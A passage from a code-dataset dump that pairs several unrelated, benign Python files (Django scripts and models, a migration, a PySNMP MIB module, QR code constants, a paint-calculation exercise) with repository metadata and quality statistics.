] | null | null | null | meiduo_mall/scripts/regenerate_detail_html.py | 1103928458/meiduo_drf | 49595755f264b09ea748b4deb8a88bba5eb8557b | [
"MIT"
] | null | null | null | meiduo_mall/scripts/regenerate_detail_html.py | 1103928458/meiduo_drf | 49595755f264b09ea748b4deb8a88bba5eb8557b | [
"MIT"
] | 1 | 2020-11-10T07:22:42.000Z | 2020-11-10T07:22:42.000Z | # from django.shortcuts import render
# import os
# from django.conf import settings
# from goods.models import SKU
# from contents.utils import get_categories
# from goods.utils import get_breadcrumb
#
# def generate_static_sku_detail_html(sku_id):
#
# sku = SKU.objects.get(id=sku_id)
#
# category = sku.category # 三级类别数据
# spu = sku.spu
#
# """1.准备当前商品的规格选项列表 [8, 11]"""
# # 获取出当前正显示的sku商品的规格选项id列表
# current_sku_spec_qs = sku.specs.order_by('spec_id')
# current_sku_option_ids = [] # [8, 11]
# for current_sku_spec in current_sku_spec_qs:
# current_sku_option_ids.append(current_sku_spec.option_id)
#
# """2.构造规格选择仓库
# {(8, 11): 3, (8, 12): 4, (9, 11): 5, (9, 12): 6, (10, 11): 7, (10, 12): 8}
# """
# # 构造规格选择仓库
# temp_sku_qs = spu.sku_set.all() # 获取当前spu下的所有sku
# # 选项仓库大字典
# spec_sku_map = {} # {(8, 11): 3, (8, 12): 4, (9, 11): 5, (9, 12): 6, (10, 11): 7, (10, 12): 8}
# for temp_sku in temp_sku_qs:
# # 查询每一个sku的规格数据
# temp_spec_qs = temp_sku.specs.order_by('spec_id')
# temp_sku_option_ids = [] # 用来包装每个sku的选项值
# for temp_spec in temp_spec_qs:
# temp_sku_option_ids.append(temp_spec.option_id)
# spec_sku_map[tuple(temp_sku_option_ids)] = temp_sku.id
#
# """3.组合 并找到sku_id 绑定"""
# spu_spec_qs = spu.specs.order_by('id') # 获取当前spu中的所有规格
#
# for index, spec in enumerate(spu_spec_qs): # 遍历当前所有的规格
# spec_option_qs = spec.options.all() # 获取当前规格中的所有选项
# temp_option_ids = current_sku_option_ids[:] # 复制一个新的当前显示商品的规格选项列表
# for option in spec_option_qs: # 遍历当前规格下的所有选项
# temp_option_ids[index] = option.id # [8, 12]
# option.sku_id = spec_sku_map.get(tuple(temp_option_ids)) # 给每个选项对象绑定下他sku_id属性
#
# # spec.spec_options = spec_option_qs # 把规格下的所有选项绑定到规格对象的spec_options属性上
#
# context = {
# 'categories': get_categories(), # 商品分类
# 'breadcrumb': get_breadcrumb(category), # 面包屑导航
# 'sku': sku, # 当前要显示的sku模型对象
# 'category': category, # 当前的显示sku所属的三级类别
# 'spu': spu, # sku所属的spu
# 'spec_qs': spu_spec_qs, # 当前商品的所有规格数据
# }
#
# response = render(None, 'detail.html', context)
# html_text = response.content.decode()
# file_path = os.path.join(settings.STATICFILES_DIRS[0], 'detail/' + str(sku_id) + '.html')
# with open(file_path, 'w') as f:
# f.write(html_text)
#
#
# if __name__ == '__main__':
# skus = SKU.objects.all()
# for sku in skus:
# print(sku.id)
# generate_static_sku_detail_html(sku.id) | 37.927536 | 101 | 0.620558 | 348 | 2,617 | 4.359195 | 0.304598 | 0.053395 | 0.047462 | 0.037574 | 0.124588 | 0.104153 | 0.076467 | 0.034278 | 0.034278 | 0.034278 | 0 | 0.032581 | 0.237677 | 2,617 | 69 | 102 | 37.927536 | 0.72782 | 0.938097 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0eafba60413846c138910dc0d814f1ad191425ea | 1,841 | py | Python | run_extraction_and_generation.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | 1 | 2020-10-01T01:07:11.000Z | 2020-10-01T01:07:11.000Z | run_extraction_and_generation.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | null | null | null | run_extraction_and_generation.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | null | null | null | import json
import pathlib
from src.extract_old_site.extract import run_extraction
from src.generate_new_site.generate import generate_site
if __name__ == "__main__":
script_root_dir = pathlib.Path(__file__).parent
config = None
with open((script_root_dir / "config.json")) as f:
config = json.load(f)
# Resolve any default config values
if config["extractionOutputDirPath"] == "Default":
config["extractionOutputDirPath"] = str(script_root_dir / "jsons")
if config["generationOutputDirPath"] == "Default":
config["generationOutputDirPath"] = str(script_root_dir / "newdig")
(script_root_dir / "newdig").mkdir(parents=True, exist_ok=True)
# Set up for generating the site
dig_dir = str((pathlib.Path(config["digParentDirPath"]) / "dig").as_posix())
input_dir = config["extractionOutputDirPath"]
output_dir = config["generationOutputDirPath"]
overwrite_out = config["overwriteExistingGeneratedFiles"]
copy_images = config["copyImages"]
copy_videos = config["copyVideos"]
copy_data = config["copyData"]
# Run extraction and site generation
if config['runExtraction']:
print("\n-----------------------------------\n"
"Extracting old site data.\n")
run_extraction(config)
else:
print("\n-----------------------------------\n"
"SKIPPING extracting old site data.\n")
if config['runGeneration']:
print("\n-----------------------------------\n"
"Generating new site files.\n")
generate_site(dig_dir, input_dir, output_dir, overwrite_out, copy_images, copy_videos, copy_data)
else:
print("\n-----------------------------------\n"
"SKIPPING generating new site files.\n")
# if config['runDigPro']:
# TODO
# pass
| 38.354167 | 105 | 0.612167 | 195 | 1,841 | 5.54359 | 0.384615 | 0.046253 | 0.06013 | 0.029602 | 0.118409 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204237 | 1,841 | 47 | 106 | 39.170213 | 0.737884 | 0.072243 | 0 | 0.171429 | 1 | 0 | 0.338624 | 0.191064 | 0 | 0 | 0 | 0.021277 | 0 | 1 | 0 | false | 0 | 0.114286 | 0 | 0.114286 | 0.114286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7ecfee91de6afd15c9b4944fc8130ce2c7df090a | 162 | py | Python | top_players.py | ergest/Fantasy-Premier-League | 7773eaad57058e760c5d1f77cfa98d2a06d73e48 | [
"MIT"
] | 1,011 | 2016-12-30T09:37:45.000Z | 2022-03-31T02:50:09.000Z | top_players.py | ergest/Fantasy-Premier-League | 7773eaad57058e760c5d1f77cfa98d2a06d73e48 | [
"MIT"
] | 111 | 2018-04-13T02:02:09.000Z | 2022-02-21T05:07:39.000Z | top_players.py | ergest/Fantasy-Premier-League | 7773eaad57058e760c5d1f77cfa98d2a06d73e48 | [
"MIT"
] | 739 | 2017-12-27T03:30:18.000Z | 2022-03-22T14:09:04.000Z | from getters import *
from parsers import *
def main():
data = get_data()
parse_top_players(data, 'data/2020-21')
if __name__ == '__main__':
main()
| 16.2 | 43 | 0.654321 | 22 | 162 | 4.318182 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046875 | 0.209877 | 162 | 9 | 44 | 18 | 0.695313 | 0 | 0 | 0 | 0 | 0 | 0.123457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7ed81731d9af7ea6f386a90d704f7cac21f33072 | 194 | py | Python | QRCodeLib/qrcodelib/format/mode_indicator.py | yas78/QRCodeLibPy | 7b2c489b5e38aa23619ae41bff7a31993885275b | [
"MIT"
] | null | null | null | QRCodeLib/qrcodelib/format/mode_indicator.py | yas78/QRCodeLibPy | 7b2c489b5e38aa23619ae41bff7a31993885275b | [
"MIT"
] | 1 | 2019-11-04T13:44:44.000Z | 2019-11-04T13:44:44.000Z | QRCodeLib/qrcodelib/format/mode_indicator.py | yas78/QRCodeLibPy | 7b2c489b5e38aa23619ae41bff7a31993885275b | [
"MIT"
] | null | null | null | class ModeIndicator:
LENGTH = 4
TERMINATOR_VALUE = 0x0
NUMERIC_VALUE = 0x1
ALPHANUMERIC_VALUE = 0x2
STRUCTURED_APPEND_VALUE = 0x3
BYTE_VALUE = 0x4
KANJI_VALUE = 0x8
| 19.4 | 33 | 0.690722 | 23 | 194 | 5.521739 | 0.782609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091549 | 0.268041 | 194 | 9 | 34 | 21.555556 | 0.802817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092784 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7ee162a59b2d4c88fd31a1e5da83b93341c5641c | 2,980 | py | Python | planner/migrations/0020_auto_20171028_1709.py | zhajio1988/Vplanner | 2b84bac7c8e36fde5eecc73682fde561613273d1 | [
"Apache-2.0"
] | 4 | 2019-08-26T01:20:35.000Z | 2022-01-26T09:18:27.000Z | planner/migrations/0020_auto_20171028_1709.py | zhajio1988/Vplanner | 2b84bac7c8e36fde5eecc73682fde561613273d1 | [
"Apache-2.0"
] | null | null | null | planner/migrations/0020_auto_20171028_1709.py | zhajio1988/Vplanner | 2b84bac7c8e36fde5eecc73682fde561613273d1 | [
"Apache-2.0"
] | 1 | 2020-07-27T16:14:01.000Z | 2020-07-27T16:14:01.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-28 09:09
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('planner', '0019_auto_20171028_1706'),
]
operations = [
migrations.CreateModel(
name='FeatureDetail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('priority', models.CharField(choices=[('p1', 'P1'), ('p2', 'P2'), ('p3', 'P3')], default='p1', max_length=10)),
('sim_req', models.CharField(max_length=128, verbose_name='Simulation Requirements')),
('seq_req', models.CharField(max_length=128, verbose_name='Sequence Requirements')),
('check_desp', models.CharField(max_length=128, verbose_name='Checking Description')),
('func_cov_req', models.CharField(max_length=128, verbose_name='Func Cov Requirements')),
('measure_src', models.TextField(verbose_name='Measure Source')),
('test_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Testcase Coverage')),
('line_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Line Coverage')),
('con_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Conditional Coverage')),
('toggle_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Toggle Coverage')),
('fsm_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='FSM Coverage')),
('branch_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Branch Coverage')),
('assert_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Assertion Coverage')),
('func_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Functional Coverage')),
('feature', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='planner.Feature')),
],
),
migrations.RenameModel(
old_name='OperationLogs',
new_name='ChangeList',
),
migrations.RemoveField(
model_name='featureitem',
name='feature',
),
migrations.DeleteModel(
name='FeatureItem',
),
]
| 59.6 | 171 | 0.667785 | 294 | 2,980 | 6.608844 | 0.35034 | 0.079259 | 0.09264 | 0.168811 | 0.506948 | 0.506948 | 0.506948 | 0.487391 | 0.424086 | 0.424086 | 0 | 0.035774 | 0.193289 | 2,980 | 49 | 172 | 60.816327 | 0.772463 | 0.022819 | 0 | 0.095238 | 1 | 0 | 0.167068 | 0.007907 | 0 | 0 | 0 | 0 | 0.02381 | 1 | 0 | false | 0 | 0.095238 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7ee771d4ce34d997b16dc36b66c0cfae9cd23bd9 | 1,177 | py | Python | typhon/core/type_system/constraints/member_constraint.py | strongrex2001/typhon | 7a8ad7e0252768844009ab331fc8aa61350f23a9 | [
"Apache-2.0"
] | 4 | 2021-03-03T12:44:34.000Z | 2021-07-03T10:15:43.000Z | typhon/core/type_system/constraints/member_constraint.py | eliphatfs/typhon | 7a8ad7e0252768844009ab331fc8aa61350f23a9 | [
"Apache-2.0"
] | null | null | null | typhon/core/type_system/constraints/member_constraint.py | eliphatfs/typhon | 7a8ad7e0252768844009ab331fc8aa61350f23a9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 14 09:40:01 2021
@author: eliphat
"""
from ..type_var import TypeVar
from ..type_repr import RecordType, BottomType
from ..system import TypeSystem
from .base_constraint import BaseConstraint
from .equality_constraint import EqualityConstraint
class MemberConstraint(BaseConstraint):
def __init__(self, v_dst: TypeVar, v_src: TypeVar, record_label: str):
self.dst = v_dst
self.src = v_src
self.k = record_label
def cause_vars(self):
return [self.src]
def effect_vars(self):
return [self.dst]
def fix(self, ts: TypeSystem):
T = self.src.T
if isinstance(T, BottomType):
return
if isinstance(T, RecordType):
if self.k in T.members:
rec = T.members[self.k]
if isinstance(rec, TypeVar):
ts.add_constraint(EqualityConstraint(self.dst, rec))
else:
self.dst.T = rec
return
raise TypeError("Type %s does not have member %s" % (T, self.k))
def is_resolved(self):
return isinstance(self.src.T, RecordType)
| 28.02381 | 74 | 0.607477 | 148 | 1,177 | 4.709459 | 0.432432 | 0.040172 | 0.040172 | 0.05165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015644 | 0.293968 | 1,177 | 41 | 75 | 28.707317 | 0.823105 | 0.064571 | 0 | 0.068966 | 0 | 0 | 0.028362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.172414 | false | 0 | 0.172414 | 0.103448 | 0.551724 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
7eee18f21f85e2ef6c713447b04ed57350a47292 | 3,281 | py | Python | pysnmp-with-texts/Juniper-V35-CONF.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/Juniper-V35-CONF.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/Juniper-V35-CONF.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module Juniper-V35-CONF (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Juniper-V35-CONF
# Produced by pysmi-0.3.4 at Wed May 1 14:04:44 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection")
juniAgents, = mibBuilder.importSymbols("Juniper-Agents", "juniAgents")
ModuleCompliance, AgentCapabilities, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "AgentCapabilities", "NotificationGroup")
Bits, Integer32, MibIdentifier, Counter32, Gauge32, NotificationType, IpAddress, ModuleIdentity, iso, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, TimeTicks, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "Integer32", "MibIdentifier", "Counter32", "Gauge32", "NotificationType", "IpAddress", "ModuleIdentity", "iso", "ObjectIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "TimeTicks", "Unsigned32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
juniV35Agent = ModuleIdentity((1, 3, 6, 1, 4, 1, 4874, 5, 2, 54))
juniV35Agent.setRevisions(('2002-09-06 16:54', '2002-01-25 21:43',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: juniV35Agent.setRevisionsDescriptions(('Replaced Unisphere names with Juniper names.', 'The initial release of this management information module.',))
if mibBuilder.loadTexts: juniV35Agent.setLastUpdated('200209061654Z')
if mibBuilder.loadTexts: juniV35Agent.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: juniV35Agent.setContactInfo(' Juniper Networks, Inc. Postal: 10 Technology Park Drive Westford, MA 01886-3146 USA Tel: +1 978 589 5800 E-mail: mib@Juniper.net')
if mibBuilder.loadTexts: juniV35Agent.setDescription('The agent capabilities definitions for the X.21/V.35 server component of the SNMP agent in the Juniper E-series family of products.')
juniV35AgentV1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 54, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniV35AgentV1 = juniV35AgentV1.setProductRelease('Version 1 of the X.21/V.35 component of the JUNOSe SNMP agent. This\n version of the X.21/V.35 component is supported in JUNOSe 4.0 and\n subsequent system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniV35AgentV1 = juniV35AgentV1.setStatus('current')
if mibBuilder.loadTexts: juniV35AgentV1.setDescription('The MIB supported by the SNMP agent for the X.21/V.35 application in JUNOSe.')
mibBuilder.exportSymbols("Juniper-V35-CONF", juniV35AgentV1=juniV35AgentV1, PYSNMP_MODULE_ID=juniV35Agent, juniV35Agent=juniV35Agent)
| 105.83871 | 477 | 0.772021 | 389 | 3,281 | 6.506427 | 0.439589 | 0.063611 | 0.049783 | 0.065192 | 0.307388 | 0.229158 | 0.219676 | 0.203872 | 0.203872 | 0.203872 | 0 | 0.081951 | 0.09997 | 3,281 | 30 | 478 | 109.366667 | 0.775144 | 0.09936 | 0 | 0.136364 | 0 | 0.136364 | 0.410726 | 0.014936 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.318182 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
7d0038100c8c0111fa664f6eb6cc9dd2beee4fca | 335 | py | Python | chatting/models.py | aliakbars/tbdc | ac8fe28b781cbc5e6e9cf7dc9579cc94c7e9ec55 | [
"Apache-2.0"
] | null | null | null | chatting/models.py | aliakbars/tbdc | ac8fe28b781cbc5e6e9cf7dc9579cc94c7e9ec55 | [
"Apache-2.0"
] | null | null | null | chatting/models.py | aliakbars/tbdc | ac8fe28b781cbc5e6e9cf7dc9579cc94c7e9ec55 | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Chat(models.Model):
content = models.TextField()
sender = models.ForeignKey(User)
receiver = models.ForeignKey(User)
date_created = models.DateTimeField(auto_now_add=True) | 30.454545 | 58 | 0.776119 | 44 | 335 | 5.727273 | 0.659091 | 0.079365 | 0.15873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143284 | 335 | 11 | 58 | 30.454545 | 0.878049 | 0.071642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7d187ae720e582888dbe9f2c84697c0a7a77dbce | 352 | py | Python | curso_em_video/mundo_1/exs_python/ExPy011.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | 1 | 2020-09-19T21:39:12.000Z | 2020-09-19T21:39:12.000Z | curso_em_video/mundo_1/exs_python/ExPy011.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | null | null | null | curso_em_video/mundo_1/exs_python/ExPy011.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | null | null | null | l = float(input('Digite a largura da parede em metros: '))
al = float(input('Digite a altura da parede em metros: '))
#Um litro de tinta pinta 2m², largura * altura da parede obtemos a área dela em m² e dividimos por dois para obter a quantidade de tinta necessária.
lt = (l * al) / 2
print(f'Com uma parede {l}x{al}, você usará {lt:.2f}L de tinta')
| 44 | 148 | 0.704545 | 66 | 352 | 3.757576 | 0.606061 | 0.096774 | 0.129032 | 0.137097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017483 | 0.1875 | 352 | 7 | 149 | 50.285714 | 0.84965 | 0.417614 | 0 | 0 | 0 | 0 | 0.632353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.